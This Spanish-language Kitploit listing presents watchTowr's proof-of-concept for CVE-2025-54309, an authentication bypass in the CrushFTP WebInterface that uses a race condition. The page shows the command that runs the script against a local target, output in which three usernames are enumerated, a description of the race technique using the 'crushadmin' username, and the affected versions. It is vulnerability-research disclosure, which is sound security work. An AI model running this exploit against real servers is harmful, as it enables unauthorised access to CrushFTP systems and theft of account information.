Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
watchTowr-vs-CrushFTP-Authentication-Bypass-CVE-2025-54309 — Exploit de prueba de concepto para CVE-2025-54309, que demuestra una evasión de autenticación mediante condición de carrera en CrushFTP WebInterface para enumerar usuarios. | Kitploit
Herramientas/GitHubGitHub/watchtowrlabs/watchtowr-vs-crushftp-authentication-bypass-cve-2025-54309
Análisis de VulnerabilidadesExplotaciónRecopilación de InformaciónSeguridad WebPruebas de PenetraciónAutenticación
GitHubwatchtowrlabs/watchtowr-vs-crushftp-authentication-bypass-cve-2025-54309

watchTowr-vs-CrushFTP-Authentication-Bypass-CVE-2025-54309

Exploit de prueba de concepto para CVE-2025-54309, que demuestra una evasión de autenticación mediante condición de carrera en CrushFTP WebInterface para enumerar usuarios.

Ver Repositorio
2832hace 1 añoRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-54309

Una prueba de concepto de omisión de autenticación de CrushFTP

Vea nuestra [publicación en el blog] (https://labs.watchtowr.com/) para detalles técnicos

Detección en acción

root@kitploit:~
python3 watchTowr-vs-CrushFTP-CVE-2025-54309.py http://127.0.0.1:8082
[*] Generated new c2f value: 6XDQ
                         __         ___  ___________                   
         __  _  ______ _/  |__ ____ |  |_\__    ____\____  _  ________ 
         \ \/ \/ \__  \    ___/ ___\|  |  \|    | /  _ \ \/ \/ \_  __ \
          \     / / __ \|  | \  \___|   Y  |    |(  <_> \     / |  | \/
           \/\_/ (____  |__|  \___  |___|__|__  | \__  / \/\_/  |__|   
                                  \/          \/     \/                            
          
        watchTowr-vs-CrushFTP-CVE-2025-54309.py
        (*) CrushFTP Authentication Bypass Race Condition PoC
        
          - Sonny , watchTowr ([email protected])

        CVEs: [CVE-2025-54309]
        
[*] CRUSHFTP RACE CONDITION POC
[*] TARGET: http://127.0.0.1:8082
[*] ENDPOINT: CrushFTP WebInterface getUserList
[*] ATTACK: 5000 requests with new c2f every 50 requests
============================================================
Starting race with 5000 request pairs...
============================================================
[*] Generated new c2f value: qUwd
[*] NEW SESSION: c2f=qUwd
[*] EXFILTRATED 3 USERS: crushadmin, default, TempAccount
[*] VULNERABLE! RACE CONDITION POSSIBLE!

Descripción

Este script es una prueba de concepto para CVE-2025-54309 contra interfaces de CrushFTP. Al crear un conjunto de solicitudes de carrera que comparten los mismos identificadores de sesión, una solicitud para establecer la propiedad de nombre de usuario a "crushadmin" y otra para ejecutar un comando autenticado como este usuario, es posible en este PoC extraer la lista de nombres de usuario. Más detalles se describen en nuestra [publicación en el blog] (https://labs.watchtowr.com/).

Versiones afectadas

  • antes de 10.8.5
  • 11 antes de 11.3.4_23

Más detalles en Aviso de CrushFTP

Siga a watchTowr Labs

Para las últimas investigaciones de seguridad, siga al equipo de watchTowr Labs

  • https://labs.watchtowr.com/
  • https://x.com/watchtowrcyber
Descargar herramienta